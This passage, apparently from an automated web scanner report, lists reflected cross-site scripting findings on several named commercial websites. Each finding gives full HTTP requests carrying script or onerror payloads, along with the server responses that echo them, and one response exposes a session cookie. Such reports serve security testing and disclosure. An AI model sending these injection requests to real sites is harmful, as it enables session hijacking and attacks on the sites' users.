GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 HTTP/1.1 Host: serve.directdigitalllc.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 15:16:07 GMT Server: Apache/2.2.16 (Amazon) X-Powered-By: PHP/5.3.6 Connection: keep-alive Content-Length: 9750 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <style> /* begin reset */ html {margin:0;padding:0;border:0;} body, div, span, object, ifram...[SNIP]... wn;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=7792f"><script>alert(1)</script>5f008c5eb4 https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C17%2C104&t=11">...[SNIP]...
3.74. http://serve.directdigitalllc.com/serve.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://serve.directdigitalllc.com
Path:
/serve.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24c33"><script>alert(1)</script>ea769a6fa16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16 trg= HTTP/1.1 Host: serve.directdigitalllc.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 15:16:07 GMT Server: Apache/2.2.16 (Amazon) X-Powered-By: PHP/5.3.6 Connection: keep-alive Content-Length: 9778 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <style> /* begin reset */ html {margin:0;padding:0;border:0;} body, div, span, object, ifram...[SNIP]... known;p=6;f=1087333;h=840708;k=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?/24c33"><script>alert(1)</script>ea769a6fa16 trg=https://crm.directdigitalllc.com/click?a=76&b=26&p=76%2C104%2C125&t=11">...[SNIP]...
3.75. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://snas.nbcuni.com
Path:
/snas/api/getRemoteDomainCookies
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 26c64<script>alert(1)</script>321541649f9 was submitted in the callback parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 HTTP/1.1 Host: snas.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:00:47 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30 X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5 Cache-Control: max-age=10 Expires: Tue, 06 Sep 2011 15:00:57 GMT Content-Length: 208 Content-Type: text/html __nbcsnasadops.doSCallback26c64<script>alert(1)</script>321541649f9 ({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});
3.76. http://wd.sharethis.com/api/getCount2.php [cb parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://wd.sharethis.com
Path:
/api/getCount2.php
Issue detail
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e05fc%3balert(1)//177df2a42e6 was submitted in the cb parameter. This input was echoed as e05fc;alert(1)//177df2a42e6 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /api/getCount2.php?cb=stButtons.processCBe05fc%3balert(1)//177df2a42e6 &url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Tue, 06 Sep 2011 15:32:13 GMT Content-Type: text/html Connection: keep-alive Content-Length: 277 (function(){stButtons.processCBe05fc;alert(1)//177df2a42e6 ({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_...[SNIP]...
3.77. http://www.dove.us/Products/Hair/ [ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dove.us
Path:
/Products/Hair/
Issue detail
The value of the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41eb5"><script>alert(1)</script>fe65f901e8 was submitted in the ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7 parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 HTTP/1.1 Host: www.dove.us User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.dove.us/Products/Hair/?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=1 Cookie: ASP.NET_SessionId=p00w4n55ylvqfa45ehz13x45
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 29750 Date: Tue, 06 Sep 2011 16:53:45 GMT Connection: close <!doctype html> <!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]--> <!--[if IE 7 ]> <html l...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088%22%3E%3Cscript%3Eprompt(%22E-Mail?%22)%3C/script%3Ed91bc007f7=41eb5"><script>alert(1)</script>fe65f901e8 & send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial& height=21" title="Recommend" scrolling="no" frameborder="0"...[SNIP]...
3.78. http://www.dove.us/Products/Hair/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.dove.us
Path:
/Products/Hair/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba088"><script>alert(1)</script>d91bc007f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Products/Hair/?ba088"><script>alert(1)</script>d91bc007f7 =1 HTTP/1.1 Host: www.dove.us Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Vary: Accept-Encoding Content-Length: 29548 Date: Tue, 06 Sep 2011 16:45:50 GMT Connection: close <!doctype html> <!--[if lt IE 7 ]> <html lang="en" class="no-js ie6" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/> <![endif]--> <!--[if IE 7 ]> <html l...[SNIP]... <iframe src="http://www.facebook.com/plugins/like.php?app_id=165670856825683&href=http://www.dove.us/Products/Hair/default.aspx?ba088"><script>alert(1)</script>d91bc007f7 =1& send=false&layout=button_count&width=140&show_faces=true&action=recommend&colorscheme=light&font=arial& height=21" title="Recommend" scrolling="no" frameborder="...[SNIP]...
3.79. http://www.harbottle.com/hnl/pages/hnl_search2.php [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 353c3><img src=a onerror=alert(1)>9d536909165a5febf in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document. The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /hnl/pages/hnl_search2.php/353c3><img%20src%3da%20onerror%3dalert(1)>9d536909165a5febf ?search=xss HTTP/1.1 Host: www.harbottle.com Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid= Cache-Control: max-age=0 Origin: http://www.harbottle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:44:52 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5158 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/353c3><img src=a onerror=alert(1)>9d536909165a5febf .php class=fineprint style="text-decoration:none">...[SNIP]...
3.80. http://www.harbottle.com/hnl/pages/hnl_search2.php [search parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php
Issue detail
The value of the search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c874d"><script>alert(1)</script>742e151d0f9 was submitted in the search parameter. This input was echoed as c874d\"><script>alert(1)</script>742e151d0f9 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /hnl/pages/hnl_search2.php HTTP/1.1 Host: www.harbottle.com Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl.php?gclid= Content-Length: 10 Cache-Control: max-age=0 Origin: http://www.harbottle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=7854507.156208429.1315345397.1315345397.1315345397.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345397.1.1.utmccn=(organic)|utmcsr=google|utmctr=Harbottle+%26+Lewis|utmcmd=organic search=xssc874d"><script>alert(1)</script>742e151d0f9
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:44:44 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Connection: close Content-Type: text/html Content-Length: 11217 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <base href=http:/...[SNIP]... <input type="text" name=search id="txt-search-fld" class="txt-search" value="xssc874d\"><script>alert(1)</script>742e151d0f9 " />...[SNIP]...
3.81. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f was submitted in the REST URL parameter 4. This input was echoed as 136b4><img src=a onerror=alert(1)>d7f0728306f in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/136b4><img%20src%3da%20onerror%3dalert(1)>d7f0728306f ?search=xss HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:45 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5152 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/136b4><img src=a onerror=alert(1)>d7f0728306f .php class=fineprint style="text-decoration:none">...[SNIP]...
3.82. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 was submitted in the REST URL parameter 4. This input was echoed as 70e82<img src=a onerror=alert(1)>070b3549546 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf70e82<img%20src%3da%20onerror%3dalert(1)>070b3549546 ?search=xss HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: __utma=7854507.756042197.1315345754.1315345754.1315345754.1; __utmb=7854507; __utmc=7854507; __utmz=7854507.1315345754.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:49 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5219 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <img src=a onerror=prompt(document.location)>9d536909165a5febf70e82<img src=a onerror=alert(1)>070b3549546 .php class=fineprint style="text-decoration:none">...[SNIP]...
3.83. http://www.harbottle.com/hnl/pages/hnl_search2.php/a [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/a
Issue detail
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload b2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 was submitted in the REST URL parameter 4. This input was echoed as b2a8a><img src=a onerror=alert(1)>2ab92f55609 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/ab2a8a><img%20src%3da%20onerror%3dalert(1)>2ab92f55609 HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:25 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5153 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/ab2a8a><img src=a onerror=alert(1)>2ab92f55609 .php class=fineprint style="text-decoration:none">...[SNIP]...
3.84. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
Issue detail
The value of REST URL parameter 5 is copied into the name of an HTML tag attribute. The payload 7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 was submitted in the REST URL parameter 5. This input was echoed as 7efde><img src=a onerror=alert(1)>d1b7aafafe7 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg7efde><img%20src%3da%20onerror%3dalert(1)>d1b7aafafe7 HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:26 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5179 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/Chambers 2011 Firm Logo.jpg7efde><img src=a onerror=alert(1)>d1b7aafafe7 .php class=fineprint style="text-decoration:none">...[SNIP]...
3.85. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a was submitted in the REST URL parameter 5. This input was echoed as 1e850><img src=a onerror=alert(1)>dd18401005a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/pix/1e850><img%20src%3da%20onerror%3dalert(1)>dd18401005a HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:31 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5152 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/1e850><img src=a onerror=alert(1)>dd18401005a .php class=fineprint style="text-decoration:none">...[SNIP]...
3.86. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif
Issue detail
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 was submitted in the REST URL parameter 5. This input was echoed as e2a6e><img src=a onerror=alert(1)>39a70330b58 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /hnl/pages/hnl_search2.php/pix/e2a6e><img%20src%3da%20onerror%3dalert(1)>39a70330b58 HTTP/1.1 Host: www.harbottle.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(%22E-Mail?%22)%3E9d536909165a5febf?search=xss
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:49:31 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Content-Length: 5152 Connection: close Content-Type: text/html <body margin=0> <div id="blanket" style="display:none;"></div> <meta name="section" content="" /> <div id="main"> <div id="header"> <div class="w-left"> <a href="pages/...[SNIP]... <a href=http://www.harbottle.com/hnl/preview/pages/e2a6e><img src=a onerror=alert(1)>39a70330b58 .php class=fineprint style="text-decoration:none">...[SNIP]...
3.87. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif [REST URL parameter 5]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.harbottle.com
Path:
